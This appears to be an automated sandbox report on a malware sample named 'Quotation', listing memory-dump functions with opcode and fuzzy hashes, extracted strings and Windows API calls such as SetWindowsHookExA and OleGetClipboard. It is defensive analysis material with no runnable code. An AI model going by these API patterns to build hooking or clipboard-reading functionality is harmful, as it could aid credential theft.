Opcode ID: 00dc240b2bee442142e9628131bb1c206a7e981ee7e9c445d837309afe60771a
Instruction ID: 05bdb880d7afbe063fa7da37812a1c79544b4257fa0f0cbe9d0440c5e538ba7f
Opcode Fuzzy Hash: 00dc240b2bee442142e9628131bb1c206a7e981ee7e9c445d837309afe60771a
Instruction Fuzzy Hash: 00E19074E103198FDB15DB68C59169FB7B2FF89312F218929E819EB355DB30AC42CB80

Function 3B14B6E8 Relevance: 8.0, Strings: 6, Instructions: 471COMMON

Download Yara Rule

Strings

$dq, xrefs: 3B14BC39
$dq, xrefs: 3B14BC79
$dq, xrefs: 3B14BCA1
$dq, xrefs: 3B14BCAD
$dq, xrefs: 3B14BC45
$dq, xrefs: 3B14BC6D

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-2331353128
Opcode ID: 9862ef6e58a438ed72b1702508cf8a2873d1fd8e2de2f624655228d84ba1a3a7
Instruction ID: 7e856994628b28a43982ba0e45833e1301b65ed1c11c4cba2913dee621a0ebc2
Opcode Fuzzy Hash: 9862ef6e58a438ed72b1702508cf8a2873d1fd8e2de2f624655228d84ba1a3a7
Instruction Fuzzy Hash: 1F027F74E002098FEB14CF68C58079FB7B2EB49756F20896AE409EB355DB34DD86CB91

Function 3B625E79 Relevance: 6.1, APIs: 4, Instructions: 137
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3B625F06
GetCurrentThread.KERNEL32 ref: 3B625F43
GetCurrentProcess.KERNEL32 ref: 3B625F80
GetCurrentThreadId.KERNEL32 ref: 3B625FD9

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: af5a127a67c3a42abda99f0496be8b6f6e5a36d2011baf2efd2331167e524be0
Instruction ID: b50ecabd2b2deb0a68e3fadeffb3cb271234c8c7975cfcacf7a16ad01694053e
Opcode Fuzzy Hash: af5a127a67c3a42abda99f0496be8b6f6e5a36d2011baf2efd2331167e524be0
Instruction Fuzzy Hash: 215168B09013498FDB14DFA9D548BAEBBF1BF48310F24C05AE409A73A2D7349945CF66

Function 3B625E88 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3B625F06
GetCurrentThread.KERNEL32 ref: 3B625F43
GetCurrentProcess.KERNEL32 ref: 3B625F80
GetCurrentThreadId.KERNEL32 ref: 3B625FD9

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 01ae64973febf4ccaff66604e4d95714b97c8d3e07b5f3fd2bc4a3c18698bc59
Instruction ID: 06f4ae0630e8f84a304573500b309f4f8b9cea689f5d9a7e68314bfcccc8a3f3
Opcode Fuzzy Hash: 01ae64973febf4ccaff66604e4d95714b97c8d3e07b5f3fd2bc4a3c18698bc59
Instruction Fuzzy Hash: CF5154B09017498FDB14DFAAD548BAEBBF1AF88310F24C05DE409A73A1DB349985CF65

Function 3B1491E8 Relevance: 5.2, Strings: 4, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 3B149293
$dq, xrefs: 3B149258
$dq, xrefs: 3B149264
$dq, xrefs: 3B14929F

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: 5e26f889eacb0ae88362bd2e5d494410d5ea8555e3ad86c62f5784e461c248a8
Instruction ID: 61d3c379a1681e809923285a0c4d2b8bdc267f1f3a921c37ab794caf56a69d5d
Opcode Fuzzy Hash: 5e26f889eacb0ae88362bd2e5d494410d5ea8555e3ad86c62f5784e461c248a8
Instruction Fuzzy Hash: F7914F74B0421A9FDB54DF65C960B9EB7F6EFC9340F108569D809EB388EB309D428B91

Function 3B14CFE0 Relevance: 4.6, Strings: 3, Instructions: 801
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 3B14D3EB
$dq, xrefs: 3B14D3D7
$dq, xrefs: 3B14D3DF

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq
API String ID: 0-2861643491
Opcode ID: 7369d33e34dc4920b06775664393c130b1e52204bb773698cf405c4799b0da3c
Instruction ID: 9c52c54621150b9774ed9c29505a94bee256ba54bd868ac0bd20dee91c930487
Opcode Fuzzy Hash: 7369d33e34dc4920b06775664393c130b1e52204bb773698cf405c4799b0da3c
Instruction Fuzzy Hash: FB628330A003599FCB45DF68D590A4EB7F2FF89311B218A69D419AF359DB31ED86CB80

Function 3B144C10 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Oiq, xrefs: 3B144DC7
fiq, xrefs: 3B14531D
XPiq, xrefs: 3B144D3D

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: fiq$XPiq$\Oiq
API String ID: 0-1639307521
Opcode ID: 9503850c44dab494ec106258274f0d972ef4a236fa4f8e3bf96739a2a61c49e0
Instruction ID: ab68868c02c083e5d5afea48ed5a3633ec930bda1d746384619c2f4831c2cb1a
Opcode Fuzzy Hash: 9503850c44dab494ec106258274f0d972ef4a236fa4f8e3bf96739a2a61c49e0
Instruction Fuzzy Hash: 27616C70E002089FEB149FA5C815BAEBBF6FF88700F208529E509EB395DF754D459B91

Function 0016ECC8 Relevance: 2.9, Strings: 2, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tedq, xrefs: 0016F038
Tedq, xrefs: 0016EF8E

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID: Tedq$Tedq
API String ID: 0-4137347946
Opcode ID: af6319c3cc188d19fe1b26bf78a45083adb75afe7ac89971911f1656f0d5f99a
Instruction ID: e825bd05794a0d806c5c702bea99bfa7836ef9128d071733820f2cbc4da97a58
Opcode Fuzzy Hash: af6319c3cc188d19fe1b26bf78a45083adb75afe7ac89971911f1656f0d5f99a
Instruction Fuzzy Hash: 1AE17C34B00255DFDB24DB68C9907ADB7F2EB89300F208969E806EB355DB75DD52CB80

Function 3B1491D8 Relevance: 2.7, Strings: 2, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 3B149293
$dq, xrefs: 3B149258

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: $dq$$dq
API String ID: 0-2340669324
Opcode ID: 64bac294b2ab62d0e75ece9cbf84d79897e526fc30d591054124385ca0bb050a
Instruction ID: bf1ad4532c78cd921581057a03b6bbf8abf6587017ecf21f704f948f284963f8
Opcode Fuzzy Hash: 64bac294b2ab62d0e75ece9cbf84d79897e526fc30d591054124385ca0bb050a
Instruction Fuzzy Hash: CE516374B0420A9FDB54DB74D960B5EB7F6EBC9740F108569D809EB388EB30DD428B91

Function 0016F930 Relevance: 2.6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

Strings

4'dq, xrefs: 0016F9B2
4'dq, xrefs: 0016F9D5

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq
API String ID: 0-2306408947
Opcode ID: 01fa3376fa3e944f243fc926707855a6406f65c8beb24595a38968479fd28bc6
Instruction ID: 8f74e4df783bd94a8c33517c52193c1d811db0abf92b4d12888f6d26e64a3647
Opcode Fuzzy Hash: 01fa3376fa3e944f243fc926707855a6406f65c8beb24595a38968479fd28bc6
Instruction Fuzzy Hash: 1851A570A002199FCB05EFA8D955AEEBBB2FF89300F104569E405BB3A5DB31AD45CF51

Function 0016FEE8 Relevance: 2.5, Strings: 2, Instructions: 48COMMON

Download Yara Rule

Strings

`Qdq, xrefs: 0016FF59
`Qdq, xrefs: 0016FF16

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID: `Qdq$`Qdq
API String ID: 0-3639281033
Opcode ID: 38a384f971a874da6f6ceda204741297bcb9aa65d5885a07c2c2457e5dff92b9
Instruction ID: adc1ed20ac5c8ac6ae9f7a71ca232df0a3e97bb5446b168d7aa638b1e85d7c81
Opcode Fuzzy Hash: 38a384f971a874da6f6ceda204741297bcb9aa65d5885a07c2c2457e5dff92b9
Instruction Fuzzy Hash: 6A113C70E00358BFDB05DFB4C95175DBBB2EF89301F1495A9D808AB29EEA301E469B52

Function 0016FEF8 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

`Qdq, xrefs: 0016FF59
`Qdq, xrefs: 0016FF16

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID: `Qdq$`Qdq
API String ID: 0-3639281033
Opcode ID: 5fd57cf445a7207cc0c2cc49701dc4d4967fd667ce9e4ee2e96162cd25813ecd
Instruction ID: a03c21f59cb4207bed87d84f8600b76bd88d713701dc36722b8f4d1bfd00fe4d
Opcode Fuzzy Hash: 5fd57cf445a7207cc0c2cc49701dc4d4967fd667ce9e4ee2e96162cd25813ecd
Instruction Fuzzy Hash: 6A015E70E00319BBDB04EFB4C54175DBBB2EF88301F209568D8087B299EA305E028B51

Function 3B62236F Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B62248A

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9e9607e40346ffd5c5b1127e76c645308f566b45e818472dde3c36904b6af88a
Instruction ID: 7ab58dc4113a17d69229b4ca33c81d60acbc1b134cbbe2368d93f23c75c1905d
Opcode Fuzzy Hash: 9e9607e40346ffd5c5b1127e76c645308f566b45e818472dde3c36904b6af88a
Instruction Fuzzy Hash: CE51BDB5D00349DFDF14CF99C984ADEBBB5BF88310F24812AE819AB211D771A985CF91

Function 3B622378 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B62248A

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: a885bb8f3afe735f9fa8aa1a55c5b571b43e9e7f4d6139ca79798ceb6889345d
Instruction ID: 5a0656a3c94d46e0d1e0193a94161bef750398889fdcc7b7fb23bcc4fc635533
Opcode Fuzzy Hash: a885bb8f3afe735f9fa8aa1a55c5b571b43e9e7f4d6139ca79798ceb6889345d
Instruction Fuzzy Hash: D441BEB1D003099FDF14CF99C984ADEBBB5BF88310F60812AE819AB211D7719985CF91

Function 3B625CBC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 3B627029

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: ebd2cc5221cb3bd3c5a6ca6b8ea86f9f734bfc01f97bfeda89da377a24e4a1f2
Instruction ID: f8e734601f58ce121d42234207865960b071d88d77e9d0f9e3cd4f265ef1116a
Opcode Fuzzy Hash: ebd2cc5221cb3bd3c5a6ca6b8ea86f9f734bfc01f97bfeda89da377a24e4a1f2
Instruction Fuzzy Hash: FF4129B9900305CFEB04CF59C488AAABBF5FF88314F24C459E518AB321D775A945CFA1

Function 3B627CA4 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 3B627D38

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: a0386f5518b16e163a185a48782709bbbf5548104be37e5d045346323443e171
Instruction ID: 555da89ea5bdfe54cef7ce72f9ade1cbfe41ff507ffe934b8a5b6469b8d6f64f
Opcode Fuzzy Hash: a0386f5518b16e163a185a48782709bbbf5548104be37e5d045346323443e171
Instruction Fuzzy Hash: 5831F2B0A02248DFEB10CFA9C984BEEBBB1AF48304F208459E404AB295CB75A845CF51

Function 3B627CB0 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 3B627D38

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: e8e082be5b117ed682326410f6189aa4b8d80e119b0fe353a6eb02814ad5e22b
Instruction ID: febdf1c9f96e741ec8c93afccf76c15d3d9042f33ecf1c8876d69581689dca6e
Opcode Fuzzy Hash: e8e082be5b117ed682326410f6189aa4b8d80e119b0fe353a6eb02814ad5e22b
Instruction Fuzzy Hash: 3631E2B0D02308DFEB10CF99C984B9EBBF5AF48314F208459E504AB291DB75A845CF61

Function 3B6260C8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3B626157

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 24fc0483059aa8520fa064dc9daff7e513ea300ebf958ccd6160c0f347c6208d
Instruction ID: a899fd577e3d934b074954065fe5b6b82567958a1ec64a5b7037a4effccdc677
Opcode Fuzzy Hash: 24fc0483059aa8520fa064dc9daff7e513ea300ebf958ccd6160c0f347c6208d
Instruction Fuzzy Hash: 4D21E3B59003499FDB10CFAAD984AEEFFF4EB48320F14841AE958A7351C374A945CFA1

Function 3B6260D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3B626157

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 857c11d200e4ca7aa235cc6f5ad7e9d0791fb7f00254181cceef88bf3acb470d
Instruction ID: 17035ceae858cabe77e6af06e97195f134d3ad347642cb01cf603d743ca1ecaa
Opcode Fuzzy Hash: 857c11d200e4ca7aa235cc6f5ad7e9d0791fb7f00254181cceef88bf3acb470d
Instruction Fuzzy Hash: CB21E2B5900349AFDB10CFAAD984ADEFFF4EB48320F14841AE918A7351C374A940CFA1

Function 3B6297F0 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3B62986B

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 1575ef52f1e61f1654b05e219e83a3bfc877d478c16d2acbdc00f332fc9d42b1
Instruction ID: e25d7b73f0a316b0288f385f17c8931c1eb8c9308be8d3f82cf8930618dbea41
Opcode Fuzzy Hash: 1575ef52f1e61f1654b05e219e83a3bfc877d478c16d2acbdc00f332fc9d42b1
Instruction Fuzzy Hash: 8B21E3B5D002099FDB14DF9AD944BEEFBF5AF88320F14842AD419A7290CB74A945CFA1

Function 3B6297F2 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3B62986B

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: b17454e0baae422aba17d532e7326ccec2356b94f42693eeb7cc935966f872f2
Instruction ID: d64a9941f6019fc2c9693a3afc073de0f7317f76ae231ed580f44fd512ecbe1f
Opcode Fuzzy Hash: b17454e0baae422aba17d532e7326ccec2356b94f42693eeb7cc935966f872f2
Instruction Fuzzy Hash: B621F4B5D002099FDB14CF9AD944BEEFBF5BF88310F14842AD419A7290C774A945CFA1

Function 3B625E6C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 3B627BBD

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 99488efa270b72f0e1513133d6b806bde19b1d95d435d94ac3cf2c3396c90df8
Instruction ID: 0999ecdda0afa63b8cb33c2a87a8900e6f8970b5dbe1bb333a83a839651eab55
Opcode Fuzzy Hash: 99488efa270b72f0e1513133d6b806bde19b1d95d435d94ac3cf2c3396c90df8
Instruction Fuzzy Hash: 001142B59003488FDB10DF9AD449B9EFBF4EB48320F20845AD958A7301C374A940CFA5

Function 3B625D14 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,3B627275), ref: 3B6272FF

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 57c99f6e50f2d4cd36373dea44d3ab1f43050faf1bfcdf6a1ed17a9acee85fd1
Instruction ID: 65d8436510e2c791a5249fcaf771b7ca17dc3ce8de9cd21a0fb3c6f444191e2e
Opcode Fuzzy Hash: 57c99f6e50f2d4cd36373dea44d3ab1f43050faf1bfcdf6a1ed17a9acee85fd1
Instruction Fuzzy Hash: 9E1145B19003488FDB10DF9AC445BEEFBF4EB49324F20841AE918A7341D774A944CFA5

Function 3B627298 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,3B627275), ref: 3B6272FF

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 187c23bffb9eed3929e2db07be3b00aec88e8979b400a3c4466c7d53445e2e66
Instruction ID: b4278c5884da8b0b6608592b3e29cbea1b3175a0669280019c6a3063bbc9d004
Opcode Fuzzy Hash: 187c23bffb9eed3929e2db07be3b00aec88e8979b400a3c4466c7d53445e2e66
Instruction Fuzzy Hash: ED1133B19003488FCB10CF9AD985BEEFBF0EB89320F20841AD919A7341C774A944CFA1

Function 3B627B66 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 3B627BBD

Memory Dump Source

Source File: 00000004.00000002.2952551436.000000003B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b620000_Quotation.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e87589d7f455d2fe99c2691e61fd4e42a2a6bec072f1385d6fde3848559f9cb2
Instruction ID: 98e30cb11ff181799b68aea4870e7f8684e7169876c988a08d674d57662dab7b
Opcode Fuzzy Hash: e87589d7f455d2fe99c2691e61fd4e42a2a6bec072f1385d6fde3848559f9cb2
Instruction Fuzzy Hash: 7B1112B59003488FDB20DFAAD585BDEFBF4EB88320F20845AD959A7300C374A944CFA5

Function 0016A1DB Relevance: 1.5, Strings: 1, Instructions: 289COMMON

Download Yara Rule

Strings

], xrefs: 0016A174

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID: ]
API String ID: 0-3352871620
Opcode ID: 759817246c8d21356c743d1c8bd691c3b8d3dd9c98037d7f4da61e1d113a5670
Instruction ID: 4c9c52debf441fe224a00b6df69892cb9f43385ef433febf31e3914425b35ce9
Opcode Fuzzy Hash: 759817246c8d21356c743d1c8bd691c3b8d3dd9c98037d7f4da61e1d113a5670
Instruction Fuzzy Hash: C1B16D34A402059FCB04DB64C994AADB7B2FF89311F648529E806FB3A5DB75DC52CF81

Function 00167C8D Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

LRdq, xrefs: 00167E09

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID: LRdq
API String ID: 0-3106745678
Opcode ID: fad308c01506ea86fd278be4f450557be98f98a7b629ba79cf22c20f4d4e2424
Instruction ID: 6629e9db9c42cc7ec0f266fdd1a9e5a34dfc38ef3345502686c8fe0703f51d5f
Opcode Fuzzy Hash: fad308c01506ea86fd278be4f450557be98f98a7b629ba79cf22c20f4d4e2424
Instruction Fuzzy Hash: 8E51477191C20ACBDB1A8F64CC646BEBBB1EF66308F24485AE801EB295E7318D56C740

Function 00166ED8 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

LRdq, xrefs: 00166F0E

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID: LRdq
API String ID: 0-3106745678
Opcode ID: 7c79203f9e9b9c8ddae308d428b7a79e2695c6f908666fd3b08e013cb528f4b2
Instruction ID: b9a4bae6c2d5cd82880b67b81eb2e1a124a913dd6c6c51cfcf4c694c0286813d
Opcode Fuzzy Hash: 7c79203f9e9b9c8ddae308d428b7a79e2695c6f908666fd3b08e013cb528f4b2
Instruction Fuzzy Hash: 7A61A034704214CFCB18DB68C858AAE7BF2AF8D704F2044A9E406EB3A1CB759C11CBA1

Function 00167D28 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

LRdq, xrefs: 00167E09

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID: LRdq
API String ID: 0-3106745678
Opcode ID: 781fe648ffe7df5168d6e5486ed5825123d61c2e1c595ea9a8b5e2c5de03f39b
Instruction ID: c628362757acaf0eec136b4e7cf6263c6195d43e5eaff5a7c876384090ac11ff
Opcode Fuzzy Hash: 781fe648ffe7df5168d6e5486ed5825123d61c2e1c595ea9a8b5e2c5de03f39b
Instruction Fuzzy Hash: 4A317030E14209DBDB15CBA4C950BAEB7B1AF9A304F208969E801FB290E7719D56CB40

Function 3B144C01 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

XPiq, xrefs: 3B144D3D

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: XPiq
API String ID: 0-3497805733
Opcode ID: aa6430ffe121c6a1f9dafca7d90ec65ba1c0a1db22ddd4b728c66b87a57da1e4
Instruction ID: 91118f715d421ce76c3d2593d435647d644b3bb473b45ee1b15bae370f9d5062
Opcode Fuzzy Hash: aa6430ffe121c6a1f9dafca7d90ec65ba1c0a1db22ddd4b728c66b87a57da1e4
Instruction Fuzzy Hash: 94414B70E102089FEB54DFA9C814BAEBBF6EFC8700F208529E505AB395DE759C059B91

Function 3B14DB55 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

PHdq, xrefs: 3B14DCB1

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: PHdq
API String ID: 0-2991842255
Opcode ID: 45026cc75d5f2e1d144e357ea63cb6957f0eff1c8eb37cbb5ad41041820a8c4d
Instruction ID: cb4608cab6cd9f1794d0654f6e762888c17faca430b42474e07f585049c20398
Opcode Fuzzy Hash: 45026cc75d5f2e1d144e357ea63cb6957f0eff1c8eb37cbb5ad41041820a8c4d
Instruction Fuzzy Hash: BD419074A003499FEF15DF64C89469EBBB6EF8A741F11452AE405EB340DBB49C42CB91

Function 3B1421AD Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

PHdq, xrefs: 3B1422FB

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: PHdq
API String ID: 0-2991842255
Opcode ID: f8717c4dec7b7f56a41b36b4eea33cddc51f580ecc6fe7e2add7aaea4f12bd3f
Instruction ID: 6689f8a9c53707a606d46eb13a1632493277e5007e34ca88fc4c12a6c374d416
Opcode Fuzzy Hash: f8717c4dec7b7f56a41b36b4eea33cddc51f580ecc6fe7e2add7aaea4f12bd3f
Instruction Fuzzy Hash: 9F41D034F102058FDB05AB74C954A9EBBB2AB89661F104568D806EB391EF75CD82CBD1

Function 3B1421C0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHdq, xrefs: 3B1422FB

